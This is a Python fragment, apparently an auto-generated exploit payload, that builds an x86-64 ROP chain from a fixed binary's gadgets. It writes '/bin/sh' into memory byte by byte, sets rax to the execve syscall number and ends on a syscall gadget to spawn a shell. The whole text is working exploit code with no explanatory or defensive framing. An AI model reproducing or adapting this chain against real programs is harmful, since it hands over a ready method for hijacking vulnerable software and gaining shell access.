payload = p64(0x416ac2)
#0x0000000000416ac2: pop rcx; ret; 
payload += p64(0x80)+p64(0x41f943)
# 0x000000000041f943: xchg ecx, eax; ret 0; 
payload += p64(0x416ac2)
# 0x0000000000416ac2: pop rcx; ret; 
payload += p64(0x42927f)+p64(0x4011ab)
# 0x00000000004011ab: add byte ptr [rcx], al; pop rbp; ret; 
payload += p64(0x0)+p64(0x416ac2)
# 0x0000000000416ac2: pop rcx; ret; 
payload += p64(0x2f)+p64(0x41f943)
# 0x000000000041f943: xchg ecx, eax; ret 0; 
payload += p64(0x416ac2)
# 0x0000000000416ac2: pop rcx; ret; 
payload += p64(0x429058)+p64(0x4011ab)
# 0x00000000004011ab: add byte ptr [rcx], al; pop rbp; ret; 
payload += p64(0x0)+p64(0x416ac2)
# 0x0000000000416ac2: pop rcx; ret; 
payload += p64(0x62)+p64(0x41f943)
# 0x000000000041f943: xchg ecx, eax; ret 0; 
payload += p64(0x416ac2)
# 0x0000000000416ac2: pop rcx; ret; 
payload += p64(0x429059)+p64(0x4011ab)
# 0x00000000004011ab: add byte ptr [rcx], al; pop rbp; ret; 
payload += p64(0x0)+p64(0x416ac2)
# 0x0000000000416ac2: pop rcx; ret; 
payload += p64(0x69)+p64(0x41f943)
# 0x000000000041f943: xchg ecx, eax; ret 0; 
payload += p64(0x416ac2)
# 0x0000000000416ac2: pop rcx; ret; 
payload += p64(0x42905a)+p64(0x4011ab)
# 0x00000000004011ab: add byte ptr [rcx], al; pop rbp; ret; 
payload += p64(0x0)+p64(0x416ac2)
# 0x0000000000416ac2: pop rcx; ret; 
payload += p64(0x6e)+p64(0x41f943)
# 0x000000000041f943: xchg ecx, eax; ret 0; 
payload += p64(0x416ac2)
# 0x0000000000416ac2: pop rcx; ret; 
payload += p64(0x42905b)+p64(0x4011ab)
# 0x00000000004011ab: add byte ptr [rcx], al; pop rbp; ret; 
payload += p64(0x0)+p64(0x416ac2)
# 0x0000000000416ac2: pop rcx; ret; 
payload += p64(0x2f)+p64(0x41f943)
# 0x000000000041f943: xchg ecx, eax; ret 0; 
payload += p64(0x416ac2)
# 0x0000000000416ac2: pop rcx; ret; 
payload += p64(0x42905c)+p64(0x4011ab)
# 0x00000000004011ab: add byte ptr [rcx], al; pop rbp; ret; 
payload += p64(0x0)+p64(0x416ac2)
# 0x0000000000416ac2: pop rcx; ret; 
payload += p64(0x66)+p64(0x41f943)
# 0x000000000041f943: xchg ecx, eax; ret 0; 
payload += p64(0x416ac2)
# 0x0000000000416ac2: pop rcx; ret; 
payload += p64(0x42905d)+p64(0x4011ab)
# 0x00000000004011ab: add byte ptr [rcx], al; pop rbp; ret; 
payload += p64(0x0)+p64(0x416ac2)
# 0x0000000000416ac2: pop rcx; ret; 
payload += p64(0x68)+p64(0x41f943)
# 0x000000000041f943: xchg ecx, eax; ret 0; 
payload += p64(0x416ac2)
# 0x0000000000416ac2: pop rcx; ret; 
payload += p64(0x42905e)+p64(0x4011ab)
# 0x00000000004011ab: add byte ptr [rcx], al; pop rbp; ret; 
payload += p64(0x0)+p64(0x416ac2)
# 0x0000000000416ac2: pop rcx; ret; 
payload += p64(0x0)+p64(0x41f943)
# 0x000000000041f943: xchg ecx, eax; ret 0; 
payload += p64(0x416ac2)
# 0x0000000000416ac2: pop rcx; ret; 
payload += p64(0x42905f)+p64(0x4011ab)
# 0x00000000004011ab: add byte ptr [rcx], al; pop rbp; ret; 
payload += p64(0x0)+p64(0x40f936)
# 0x000000000040f936: pop rsi; ret 1; 
payload += p64(0x0)+p64(0x416ac2)+"\x00"*1
# 0x0000000000416ac2: pop rcx; ret; 
payload += p64(0x429058)+p64(0x41f943)
# 0x000000000041f943: xchg ecx, eax; ret 0; 
payload += p64(0x4185a9)
# 0x00000000004185a9: xchg edi, eax; ret; 
payload += p64(0x416ac2)
# 0x0000000000416ac2: pop rcx; ret; 
payload += p64(0x36b29094)+p64(0x41f943)
# 0x000000000041f943: xchg ecx, eax; ret 0; 
payload += p64(0x401314)
# 0x0000000000401314: add edx, dword ptr [rax - 0x366ffe15]; ret; 
payload += p64(0x416ac2)
# 0x0000000000416ac2: pop rcx; ret; 
payload += p64(0x3b)+p64(0x41f943)
# 0x000000000041f943: xchg ecx, eax; ret 0; 
payload += p64(0x407a85)
# 0x0000000000407a85: syscall; 
payload += b''
